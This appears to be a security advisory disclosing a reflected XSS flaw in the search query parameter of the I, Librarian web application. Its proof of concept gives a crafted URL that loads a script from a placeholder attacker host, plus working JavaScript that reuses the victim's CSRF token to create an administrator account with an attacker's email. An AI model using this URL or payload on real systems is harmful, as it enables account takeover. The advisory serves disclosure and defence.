Description

Reflected XSS (Cross-Site Scripting) is a common web security vulnerability that can occur when a user inputs malicious Javascript syntax into the search field.

The search function allows users to look for content on the website, and the search keywords are appended to the URL query string. If the website fails to properly filter and prohibit unvalidated input in the search query string, this can provide an opportunity for attackers to inject malicious code.

Attackers can construct a malicious search query string and inject Javascript code into it. When a victim accesses the link through the search keywords, the browser will parse the query string and execute the Javascript code, allowing the attacker to successfully carry out their attack.

Proof of Concept

https://i-librarian.net/demo/index.php/#items/main?search_query%5B%5D=%3Cscript%20src%3D%22%2F%2Fattacker_host%2Fpayload.js%22%3E%3C%2Fscript%3E&search_boolean%5B%5D=AND&search_type%5B%5D=anywhere

# playload.js

function payload() {
  const data = "user%5Busername%5D=&user%5Bfirst_name%5D=&user%5Blast_name%5D=&user%5Bemail%5D=attacker%40mail.com&user%5Bpermissions%5D=A&csrfToken=" + csrfToken;

  const xhr = new XMLHttpRequest();
  xhr.withCredentials = true;

  xhr.addEventListener("readystatechange", function () {
    if (this.readyState === this.DONE) {
      alert(this.responseText);
    }
  });

  xhr.open("POST", "/index.php/users/create");
  xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; rv:112.0) Gecko/20100101 Firefox/112.0");
  xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Accept-Encoding", "gzip, deflate, br");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("X-Client-Width", "1512");
  xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  xhr.setRequestHeader("Origin", "https://i-librarian.net");
  xhr.setRequestHeader("DNT", "1");
  xhr.setRequestHeader("Connection", "keep-alive");
  xhr.setRequestHeader("Referer", "https://i-librarian.net/");
  xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
  xhr.setRequestHeader("Sec-Fetch-Mode", "cors");
  xhr.setRequestHeader("Sec-Fetch-Site", "same-origin");
  xhr.setRequestHeader("Sec-GPC", "1");
  xhr.setRequestHeader("Pragma", "no-cache");
  xhr.setRequestHeader("Cache-Control", "no-cache");

  xhr.send(data);
}

setTimeout(payload, 2000);

Impact

The impact of a successful Reflected XSS attack via a search field can be very severe, as it can allow an attacker to execute malicious Javascript code on the victim's browser. The consequences can range from defacing the website, redirecting the victim to a malicious site, stealing the victim's sensitive data, to even performing actions on behalf of the victim without their knowledge.

In addition, Reflected XSS can also impact the website's reputation and trust, as it indicates that the site has not properly implemented input validation and may raise concerns among the site visitors about the overall security of the website.

Therefore, it's crucial to proactively prevent Reflected XSS attacks by implementing proper security measures and performing regular vulnerability assessments to identify and remediate potential security vulnerabilities in the search function and across the site.

Clicking on a link and logging into the dashboard as an administrator may activate automated malicious code that can create an attacker's account and obtain the password with admin permissions. It is essential to exercise utmost caution with this significant risk and take prompt measures to protect your system's security.